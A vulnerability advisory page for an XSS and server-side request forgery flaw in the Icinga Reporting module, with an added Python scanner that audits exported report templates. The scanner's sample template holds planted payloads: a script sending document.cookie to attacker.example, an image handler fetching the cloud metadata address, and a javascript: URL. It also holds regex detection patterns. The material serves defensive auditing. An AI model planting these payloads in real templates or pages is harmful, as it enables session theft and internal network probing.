CVE-2025-27406
Published: 26 March 2025
Description
Adversaries may abuse various implementations of JavaScript for execution.
Security Summary
CVE-2025-27406 is a cross-site scripting (XSS) vulnerability, classified under CWE-79 and CWE-918, in the Icinga Reporting module, which provides the reporting functionality of the Icinga Web 2 monitoring frontend. Versions 0.10.0 through 1.0.2 are affected: a user who is permitted to create report templates can embed arbitrary JavaScript in them, and that JavaScript is not neutralized when the template is rendered.
Exploitation requires network access, high privileges, user interaction and high attack complexity; the CVSS v3.1 vector is AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:H, base score 7.6 (High), with changed scope because the script executes in a security context other than the template author's. A high-privileged attacker sets up a malicious template; when another user previews it, the embedded JavaScript runs in that user's browser session and can act on their behalf. When a report that uses the template is exported to PDF, the JavaScript runs inside the headless browser on the Icinga Web server, from where it can request resources reachable from the server (server-side request forgery) or take other actions with the server's network position.
The issue is fixed in Icinga Reporting version 1.0.3. As a workaround, administrators should review all templates and remove any suspicious settings. Additional details are available in the module's release notes at https://github.com/Icinga/icingaweb2-module-reporting/releases/tag/v1.0.3 and the security advisory at https://github.com/Icinga/icingaweb2-module-reporting/security/advisories/GHSA-7qvq-54vm-r7hx.
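The workaround above asks administrators to review every template for suspicious settings. As an added example (not code from the Icinga project), the Python script below does that review mechanically: it walks a template exported as JSON, decodes HTML entities and percent-encoding so obfuscated payloads are not missed, and flags any string that would execute as script in the previewing user's browser or in the headless browser that renders the PDF. The template layout (cover_page, header and footer fields), the sample payloads, and the `escape_for_render` helper are constructed for illustration; Icinga Reporting's real template schema is assumed, not copied.

```python
import html
import json
import re
import sys
from dataclasses import dataclass
from urllib.parse import unquote

# Indicators of active content in a template string, checked in order; the
# first match wins. "data:" is flagged only when it is not a raster image,
# because a template may legitimately carry an uploaded logo as a data URL.
ACTIVE_CONTENT = [
    (re.compile(r"<\s*script\b", re.I), "script tag"),
    (re.compile(r"<\s*(iframe|object|embed|svg|math|base|meta|link|form)\b", re.I), "embedding tag"),
    (re.compile(r"\bon[a-z]+\s*=", re.I), "inline event handler"),
    (re.compile(r"\b(javascript|vbscript)\s*:", re.I), "script URL scheme"),
    (re.compile(r"\bdata\s*:(?!image/(png|jpe?g|gif|webp)\b)", re.I), "non-image data: URL"),
    (re.compile(r"@import|expression\s*\(|url\s*\(", re.I), "CSS loader"),
    (re.compile(r"<\s*[a-z!/]", re.I), "HTML markup"),
]


@dataclass(frozen=True)
class Finding:
    path: str     # JSON path of the offending string, e.g. template.settings.header.left
    label: str    # which indicator matched
    excerpt: str  # the decoded text around the match


def _normalize(value: str) -> str:
    """Decode percent-encoding and HTML entities twice, so that a payload
    hidden behind double encoding still surfaces as plain markup."""
    text = value
    for _ in range(2):
        text = html.unescape(unquote(text))
    return text


def _strings(node, path):
    """Yield (json_path, string) for every string leaf in a JSON document."""
    if isinstance(node, dict):
        for key, value in node.items():
            yield from _strings(value, f"{path}.{key}")
    elif isinstance(node, list):
        for index, value in enumerate(node):
            yield from _strings(value, f"{path}[{index}]")
    elif isinstance(node, str):
        yield path, node


def scan_template(template: dict) -> list:
    """Return one Finding per template string that carries active content."""
    findings = []
    for path, raw in _strings(template, "template"):
        text = _normalize(raw)
        for pattern, label in ACTIVE_CONTENT:
            match = pattern.search(text)
            if match:
                findings.append(Finding(path, label, text[match.start():match.start() + 48]))
                break
    return findings


def escape_for_render(value: str) -> str:
    """Output-side hardening (illustrative, not the module's own fix): a text
    field is emitted as text, so markup inside it can never become DOM."""
    return html.escape(value, quote=True)


# Constructed sample: an exported template with three planted payloads. The
# header.left payload shows the PDF case, where the script runs in the
# server-side headless browser and can reach an internal address (SSRF).
SAMPLE_TEMPLATE = {
    "name": "Quarterly SLA",
    "settings": {
        "cover_page": {
            "title": "SLA report Q1",
            "description": "Generated for <b>management</b>",
        },
        "header": {
            "left": "Hosts: <img src=x onerror=\"fetch('http://169.254.169.254/latest/meta-data/')\">",
            "center": "&#60;script&#62;location='http://attacker.example/?c='+document.cookie&#60;/script&#62;",
            "right": "data:image/png;base64,iVBORw0KGgo=",
        },
        "footer": {"left": "Page {{page}}", "right": "javascript:alert(1)"},
    },
}

if __name__ == "__main__":
    # Usage: python audit_templates.py exported_template.json
    # Without an argument the constructed sample above is scanned.
    template = json.load(open(sys.argv[1])) if len(sys.argv) > 1 else SAMPLE_TEMPLATE
    for finding in scan_template(template):
        print(f"{finding.path}: {finding.label}: {finding.excerpt!r}")
```

Every hit is a template to edit by hand before upgrading to 1.0.3, and the decoded excerpt tells the reviewer what would actually have rendered. The scanner is deliberately noisy about any markup in a text field, since Icinga Reporting text fields have no legitimate need for HTML; a hit on plain `<b>` is a prompt to look, not proof of compromise.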
Details
- CWE(s): CWE-79 (Improper Neutralization of Input During Web Page Generation, 'Cross-site Scripting'), CWE-918 (Server-Side Request Forgery)
MITRE ATT&CK Enterprise Techniques
Why these techniques?
The XSS lets template content execute arbitrary JavaScript, either in a victim's browser on preview or in the server-side headless browser during PDF export (T1059.007, JavaScript). Because Icinga Web 2 is a web frontend, planting the template is an attack on a public-facing application (T1190), and the headless-browser case additionally gives the attacker a server-side request forgery primitive.